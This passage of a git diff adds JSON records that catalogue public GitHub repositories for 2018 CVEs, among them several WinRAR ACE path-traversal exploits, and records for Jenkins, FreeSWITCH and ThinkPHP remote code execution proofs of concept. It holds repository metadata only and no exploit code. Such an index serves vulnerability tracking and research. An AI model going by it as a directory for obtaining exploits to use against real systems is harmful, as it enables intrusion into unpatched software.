0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19859.json b/2018/CVE-2018-19859.json new file mode 100644 index 0000000000..06a03edd94 --- /dev/null +++ b/2018/CVE-2018-19859.json @@ -0,0 +1,33 @@ +[ + { + "id": 306405742, + "name": "CVE-2018-19859", + "full_name": "WhiteOakSecurity\/CVE-2018-19859", + "owner": { + "login": "WhiteOakSecurity", + "id": 73299068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73299068?v=4", + "html_url": "https:\/\/github.com\/WhiteOakSecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WhiteOakSecurity\/CVE-2018-19859", + "description": "CVE-2018-19859 Remote Code Execution Proof of Concept", + "fork": false, + "created_at": "2020-10-22T17:05:11Z", + "updated_at": "2022-08-14T17:40:13Z", + "pushed_at": "2020-10-22T17:48:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19911.json b/2018/CVE-2018-19911.json new file mode 100644 index 0000000000..07b9f13593 --- /dev/null +++ b/2018/CVE-2018-19911.json @@ -0,0 +1,33 @@ +[ + { + "id": 160625335, + "name": "freeswitch_rce", + "full_name": "iSafeBlue\/freeswitch_rce", + "owner": { + "login": "iSafeBlue", + "id": 25784279, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25784279?v=4", + "html_url": "https:\/\/github.com\/iSafeBlue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iSafeBlue\/freeswitch_rce", + "description": "freeswitch all version remote command execute (cve-2018-19911)", + "fork": false, + "created_at": "2018-12-06T05:48:02Z", + "updated_at": "2024-04-28T08:48:24Z", + "pushed_at": "2018-12-06T08:47:02Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-19987.json b/2018/CVE-2018-19987.json new file mode 100644 index 0000000000..f58548a70a --- /dev/null +++ b/2018/CVE-2018-19987.json @@ -0,0 +1,33 @@ +[ + { + "id": 314390367, + "name": "blogpost_cve-2018-19987-analysis", + "full_name": "nahueldsanchez\/blogpost_cve-2018-19987-analysis", + "owner": { + "login": "nahueldsanchez", + "id": 13943251, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13943251?v=4", + "html_url": "https:\/\/github.com\/nahueldsanchez", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nahueldsanchez\/blogpost_cve-2018-19987-analysis", + "description": "This repo has a blog post about my analysis for CVE-2018-19987 an authenticated OS command injection affecting multiple D-Link routers", + "fork": false, + "created_at": "2020-11-19T23:01:11Z", + "updated_at": "2021-05-20T13:32:15Z", + "pushed_at": "2020-11-28T02:32:02Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-1999002.json b/2018/CVE-2018-1999002.json new file mode 100644 index 0000000000..15bb4cc4b7 --- /dev/null +++ b/2018/CVE-2018-1999002.json @@ -0,0 +1,95 @@ +[ + { + "id": 89426502, + "name": "Exploit-Development", + "full_name": "wetw0rk\/Exploit-Development", + "owner": { + "login": "wetw0rk", + "id": 20763546, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20763546?v=4", + "html_url": "https:\/\/github.com\/wetw0rk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wetw0rk\/Exploit-Development", + "description": "CVE-2020-8012, CVE-2016-10709, CVE-2017-17099, CVE-2017-18047, CVE-2019-1003000, CVE-2018-1999002", + "fork": false, + "created_at": "2017-04-26T02:03:43Z", + "updated_at": "2024-08-12T19:29:24Z", + "pushed_at": "2020-02-29T21:27:15Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 34, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 34, + "watchers": 56, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 174141495, + "name": "CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins", + "full_name": "slowmistio\/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins", + "owner": { + "login": "slowmistio", + "id": 25600994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25600994?v=4", + "html_url": "https:\/\/github.com\/slowmistio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/slowmistio\/CVE-2019-1003000-and-CVE-2018-1999002-Pre-Auth-RCE-Jenkins", + "description": "Python CVE-2019-1003000 and CVE-2018-1999002 Pre-Auth RCE Jenkins ", + "fork": false, + "created_at": "2019-03-06T12:31:57Z", + "updated_at": "2019-03-06T12:32:00Z", + "pushed_at": "2019-02-23T10:01:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 207471889, + "name": "CVE-2018-1999002", + "full_name": "0x6b7966\/CVE-2018-1999002", + "owner": { + "login": "0x6b7966", + "id": 22814832, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22814832?v=4", + "html_url": "https:\/\/github.com\/0x6b7966", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x6b7966\/CVE-2018-1999002", + "description": null, + "fork": false, + "created_at": "2019-09-10T05:23:48Z", + "updated_at": "2019-09-10T05:24:34Z", + "pushed_at": "2019-09-10T05:24:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-20062.json b/2018/CVE-2018-20062.json new file mode 100644 index 0000000000..0167ce7d5e --- /dev/null +++ b/2018/CVE-2018-20062.json @@ -0,0 +1,64 @@ +[ + { + "id": 176056254, + "name": "thinkphp5.XRce", + "full_name": "NS-Sp4ce\/thinkphp5.XRce", + "owner": { + "login": "NS-Sp4ce", + "id": 33349032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33349032?v=4", + "html_url": "https:\/\/github.com\/NS-Sp4ce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NS-Sp4ce\/thinkphp5.XRce", + "description": "thinkphp5.*Rce CVE-2018-20062", + "fork": false, + "created_at": "2019-03-17T04:31:13Z", + "updated_at": "2020-07-19T13:09:58Z", + "pushed_at": "2019-03-17T04:50:49Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 562747008, + "name": "CVE-2018-20062", + "full_name": "yilin1203\/CVE-2018-20062", + "owner": { + "login": "yilin1203", + "id": 71480339, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71480339?v=4", + "html_url": "https:\/\/github.com\/yilin1203", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yilin1203\/CVE-2018-20062", + "description": null, + "fork": false, + "created_at": "2022-11-07T07:05:40Z", + "updated_at": "2022-11-07T07:06:34Z", + "pushed_at": "2022-11-07T07:32:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-20148.json b/2018/CVE-2018-20148.json new file mode 100644 index 0000000000..cb3cc9faa5 --- /dev/null +++ b/2018/CVE-2018-20148.json @@ -0,0 +1,39 @@ +[ + { + "id": 428556171, + "name": "CVE-2018-20148_exploit", + "full_name": "nth347\/CVE-2018-20148_exploit", + "owner": { + "login": "nth347", + "id": 20441996, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20441996?v=4", + "html_url": "https:\/\/github.com\/nth347", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nth347\/CVE-2018-20148_exploit", + "description": "Exploit for CVE-2018-20148 - WordPress PHAR deserialization via XMLRPC", + "fork": false, + "created_at": "2021-11-16T07:19:47Z", + "updated_at": "2024-09-04T03:30:50Z", + "pushed_at": "2021-11-16T07:20:45Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "exploits", + "security", + "web", + "wordpress" + ], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-20162.json b/2018/CVE-2018-20162.json new file mode 100644 index 0000000000..cd0db4ae47 --- /dev/null +++ b/2018/CVE-2018-20162.json @@ -0,0 +1,33 @@ +[ + { + "id": 170612541, + "name": "CVE-2018-20162-digi-lr54-restricted-shell-escape", + "full_name": "stigtsp\/CVE-2018-20162-digi-lr54-restricted-shell-escape", + "owner": { + "login": "stigtsp", + "id": 75371, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75371?v=4", + "html_url": "https:\/\/github.com\/stigtsp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stigtsp\/CVE-2018-20162-digi-lr54-restricted-shell-escape", + "description": null, + "fork": false, + "created_at": "2019-02-14T02:20:13Z", + "updated_at": "2019-02-17T14:14:20Z", + "pushed_at": "2019-02-17T13:56:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-20165.json b/2018/CVE-2018-20165.json new file mode 100644 index 0000000000..d9e95b7253 --- /dev/null +++ b/2018/CVE-2018-20165.json @@ -0,0 +1,33 @@ +[ + { + "id": 167376412, + "name": "Reflected-XSS-on-Opentext-Portal-v7.4.4", + "full_name": "hect0rS\/Reflected-XSS-on-Opentext-Portal-v7.4.4", + "owner": { + "login": "hect0rS", + "id": 47000097, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47000097?v=4", + "html_url": "https:\/\/github.com\/hect0rS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hect0rS\/Reflected-XSS-on-Opentext-Portal-v7.4.4", + "description": "Reflected XSS on Opentext Portal v7.4.4: CVE-2018-20165", + "fork": false, + "created_at": "2019-01-24T13:59:14Z", + "updated_at": "2019-01-24T14:17:24Z", + "pushed_at": "2019-01-24T14:17:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-20250.json b/2018/CVE-2018-20250.json new file mode 100644 index 0000000000..26df52bf25 --- /dev/null +++ b/2018/CVE-2018-20250.json @@ -0,0 +1,599 @@ +[ + { + "id": 171996551, + "name": "CVE-2018-20250", + "full_name": "WyAtu\/CVE-2018-20250", + "owner": { + "login": "WyAtu", + "id": 23521935, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23521935?v=4", + "html_url": "https:\/\/github.com\/WyAtu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WyAtu\/CVE-2018-20250", + "description": "exp for https:\/\/research.checkpoint.com\/extracting-code-execution-from-winrar", + "fork": false, + "created_at": "2019-02-22T04:52:08Z", + "updated_at": "2024-09-09T06:55:53Z", + "pushed_at": "2019-08-05T10:45:34Z", + "stargazers_count": 487, + "watchers_count": 487, + "has_discussions": false, + "forks_count": 177, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 177, + "watchers": 487, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 172009558, + "name": "CVE-2018-20250", + "full_name": "QAX-A-Team\/CVE-2018-20250", + "owner": { + "login": "QAX-A-Team", + "id": 35417332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35417332?v=4", + "html_url": "https:\/\/github.com\/QAX-A-Team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/QAX-A-Team\/CVE-2018-20250", + "description": "010 Editor template for ACE archive format & CVE-2018-2025[0-3]", + "fork": false, + "created_at": "2019-02-22T06:47:01Z", + "updated_at": "2021-05-29T18:38:32Z", + "pushed_at": "2019-02-22T07:47:26Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 25, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 172069488, + "name": "CVE-2018-20250-poc-winrar", + "full_name": "nmweizi\/CVE-2018-20250-poc-winrar", + "owner": { + "login": "nmweizi", + "id": 1232444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1232444?v=4", + "html_url": "https:\/\/github.com\/nmweizi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nmweizi\/CVE-2018-20250-poc-winrar", + "description": null, + "fork": false, + "created_at": "2019-02-22T13:18:14Z", + "updated_at": "2019-02-22T13:20:31Z", + "pushed_at": "2019-02-22T13:20:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 172078598, + "name": "UNACEV2.DLL-CVE-2018-20250", + "full_name": "blunden\/UNACEV2.DLL-CVE-2018-20250", + "owner": { + "login": "blunden", + "id": 249915, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/249915?v=4", + "html_url": "https:\/\/github.com\/blunden", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blunden\/UNACEV2.DLL-CVE-2018-20250", + "description": "A version of the binary patched to address CVE-2018-20250", + "fork": false, + "created_at": "2019-02-22T14:19:20Z", + "updated_at": "2019-02-22T14:29:30Z", + "pushed_at": "2019-02-22T14:29:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 172156568, + "name": "CVE-2018-20250-WinRAR-ACE", + "full_name": "easis\/CVE-2018-20250-WinRAR-ACE", + "owner": { + "login": "easis", + "id": 50383201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50383201?v=4", + "html_url": "https:\/\/github.com\/easis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/easis\/CVE-2018-20250-WinRAR-ACE", + "description": "Proof of concept code in C# to exploit the WinRAR ACE file extraction path (CVE-2018-20250).", + "fork": false, + "created_at": "2019-02-23T01:20:34Z", + "updated_at": "2024-10-24T14:43:31Z", + "pushed_at": "2019-03-01T13:35:59Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 21, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 173153306, + "name": "CVE-2018-20250", + "full_name": "STP5940\/CVE-2018-20250", + "owner": { + "login": "STP5940", + "id": 21144303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21144303?v=4", + "html_url": "https:\/\/github.com\/STP5940", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/STP5940\/CVE-2018-20250", + "description": null, + "fork": false, + "created_at": "2019-02-28T17:07:52Z", + "updated_at": "2024-08-12T19:46:13Z", + "pushed_at": "2019-02-28T17:10:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 173733367, + "name": "hack-winrar", + "full_name": "technicaldada\/hack-winrar", + "owner": { + "login": "technicaldada", + "id": 32122182, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32122182?v=4", + "html_url": "https:\/\/github.com\/technicaldada", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/technicaldada\/hack-winrar", + "description": "WinRar is a very widely known software for windows. Previous version of WinRaR was a vulnerability which has been patched in Feb-2019. Most of the people didn't update winrar so they are vulnerable in this Absolute Path Traversal bug [CVE-2018-20250]", + "fork": false, + "created_at": "2019-03-04T11:36:43Z", + "updated_at": "2023-01-02T23:04:53Z", + "pushed_at": "2019-03-04T11:39:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "absolute-path-traversal-bug", + "bug", + "hack", + "windows", + "winrar" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 173947919, + "name": "ezwinrar", + "full_name": "Ektoplasma\/ezwinrar", + "owner": { + "login": "Ektoplasma", + "id": 15208659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15208659?v=4", + "html_url": "https:\/\/github.com\/Ektoplasma", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ektoplasma\/ezwinrar", + "description": "Python tool exploiting CVE-2018-20250 found by CheckPoint folks", + "fork": false, + "created_at": "2019-03-05T13:05:03Z", + "updated_at": "2023-03-14T14:38:11Z", + "pushed_at": "2019-03-05T15:51:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 174533873, + "name": "CVE-2018-20250-WINRAR-ACE-GUI", + "full_name": "arkangel-dev\/CVE-2018-20250-WINRAR-ACE-GUI", + "owner": { + "login": "arkangel-dev", + "id": 31138457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31138457?v=4", + "html_url": "https:\/\/github.com\/arkangel-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/arkangel-dev\/CVE-2018-20250-WINRAR-ACE-GUI", + "description": "CVE-2018-20250-WINRAR-ACE Exploit with a UI", + "fork": false, + "created_at": "2019-03-08T12:27:12Z", + "updated_at": "2024-08-29T01:22:26Z", + "pushed_at": "2019-05-10T05:37:10Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 174948316, + "name": "CVE-2018-20250", + "full_name": "AeolusTF\/CVE-2018-20250", + "owner": { + "login": "AeolusTF", + "id": 29159416, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29159416?v=4", + "html_url": "https:\/\/github.com\/AeolusTF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AeolusTF\/CVE-2018-20250", + "description": null, + "fork": false, + "created_at": "2019-03-11T07:33:45Z", + "updated_at": "2019-03-11T07:37:51Z", + "pushed_at": "2019-03-11T07:37:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 176534636, + "name": "Detect-CVE-2018-20250", + "full_name": "joydragon\/Detect-CVE-2018-20250", + "owner": { + "login": "joydragon", + "id": 4154219, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4154219?v=4", + "html_url": "https:\/\/github.com\/joydragon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joydragon\/Detect-CVE-2018-20250", + "description": "Herramienta para revisar si es que un payload tiene componente malicioso de acuerdo a CVE-2018-20250", + "fork": false, + "created_at": "2019-03-19T14:51:52Z", + "updated_at": "2019-03-19T15:03:27Z", + "pushed_at": "2019-03-19T15:03:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 183341455, + "name": "CVE-2018-20250", + "full_name": "likekabin\/CVE-2018-20250", + "owner": { + "login": "likekabin", + "id": 2469038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2469038?v=4", + "html_url": "https:\/\/github.com\/likekabin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likekabin\/CVE-2018-20250", + "description": null, + "fork": false, + "created_at": "2019-04-25T02:30:50Z", + "updated_at": "2019-04-25T02:31:01Z", + "pushed_at": "2019-04-25T02:30:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 187096096, + "name": "WinRar_ACE_exploit_CVE-2018-20250", + "full_name": "H4xl0r\/WinRar_ACE_exploit_CVE-2018-20250", + "owner": { + "login": "H4xl0r", + "id": 31049432, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31049432?v=4", + "html_url": "https:\/\/github.com\/H4xl0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H4xl0r\/WinRar_ACE_exploit_CVE-2018-20250", + "description": "This program is an script developed in Python which exploit the ACE vulnerability on WinRar - Vulnerability CVE-2018-20250", + "fork": false, + "created_at": "2019-05-16T20:21:50Z", + "updated_at": "2019-05-16T20:21:53Z", + "pushed_at": "2019-03-26T04:54:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 241136874, + "name": "CVE-2018-20250-WinRAR", + "full_name": "eastmountyxz\/CVE-2018-20250-WinRAR", + "owner": { + "login": "eastmountyxz", + "id": 53172375, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53172375?v=4", + "html_url": "https:\/\/github.com\/eastmountyxz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eastmountyxz\/CVE-2018-20250-WinRAR", + "description": "这资源是作者复现微软签字证书漏洞CVE-2020-0601,结合相关资源及文章实现。推荐大家结合作者博客,复现了该漏洞和理解恶意软件自启动劫持原理。作为网络安全初学者,自己确实很菜,但希望坚持下去,一起加油!", + "fork": false, + "created_at": "2020-02-17T15:08:22Z", + "updated_at": "2024-08-12T19:57:49Z", + "pushed_at": "2020-05-19T07:55:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 263515438, + "name": "cve-2018-20250", + "full_name": "lxg5763\/cve-2018-20250", + "owner": { + "login": "lxg5763", + "id": 36142720, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36142720?v=4", + "html_url": "https:\/\/github.com\/lxg5763", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lxg5763\/cve-2018-20250", + "description": "CVE-2018-20250漏洞利用", + "fork": false, + "created_at": "2020-05-13T03:28:04Z", + "updated_at": "2020-05-13T03:28:16Z", + "pushed_at": "2020-05-13T03:28:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 391782512, + "name": "CVE-2018-20250", + "full_name": "zeronohacker\/CVE-2018-20250", + "owner": { + "login": "zeronohacker", + "id": 65578786, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65578786?v=4", + "html_url": "https:\/\/github.com\/zeronohacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zeronohacker\/CVE-2018-20250", + "description": "CVE-2018-20250", + "fork": false, + "created_at": "2021-08-02T01:24:01Z", + "updated_at": "2021-08-03T01:57:08Z", + "pushed_at": "2021-08-03T01:54:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2018-20250" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 474011573, + "name": "CVE-2018-20250", + "full_name": "tzwlhack\/CVE-2018-20250", + "owner": { + "login": "tzwlhack", + "id": 86322859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86322859?v=4", + "html_url": "https:\/\/github.com\/tzwlhack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tzwlhack\/CVE-2018-20250", + "description": null, + "fork": false, + "created_at": "2022-03-25T13:02:41Z", + "updated_at": "2022-03-25T13:02:53Z", + "pushed_at": "2022-03-25T13:02:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735884488, + "name": "CVE-2018-20250", + "full_name": "tannlh\/CVE-2018-20250", + "owner": { + "login": "tannlh", + "id": 129723015, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129723015?v=4", + "html_url": "https:\/\/github.com\/tannlh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tannlh\/CVE-2018-20250", + "description": null, + "fork": false, + "created_at": "2023-12-26T11:01:32Z", + "updated_at": "2023-12-26T11:45:04Z", + "pushed_at": "2023-12-26T11:45:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 792099382, + "name": "CVE-2018-20250", + "full_name": "LamSonBinh\/CVE-2018-20250", + "owner": { + "login": "LamSonBinh", + "id": 94208851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94208851?v=4", + "html_url": "https:\/\/github.com\/LamSonBinh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LamSonBinh\/CVE-2018-20250", + "description": null, + "fork": false, + "created_at": "2024-04-26T01:18:45Z", + "updated_at": "2024-04-26T01:49:38Z", + "pushed_at": "2024-04-26T01:49:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-20343.json b/2018/CVE-2018-20343.json new file mode 100644 index 0000000000..4e59c74d51 --- /dev/null +++ b/2018/CVE-2018-20343.json @@ -0,0 +1,38 @@ +[ + { + "id": 163399664, + "name": "CVE-2018-20343", + "full_name": "Alexandre-Bartel\/CVE-2018-20343", + "owner": { + "login": "Alexandre-Bartel", + "id": 655248, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/655248?v=4", + "html_url": "https:\/\/github.com\/Alexandre-Bartel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alexandre-Bartel\/CVE-2018-20343", + "description": "PoC for CVE-2018-20343", + "fork": false, + "created_at": "2018-12-28T10:49:51Z", + "updated_at": "2023-05-27T08:23:32Z", + "pushed_at": "2019-02-08T15:55:55Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "build-engine", + "cve", + "exploit", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + 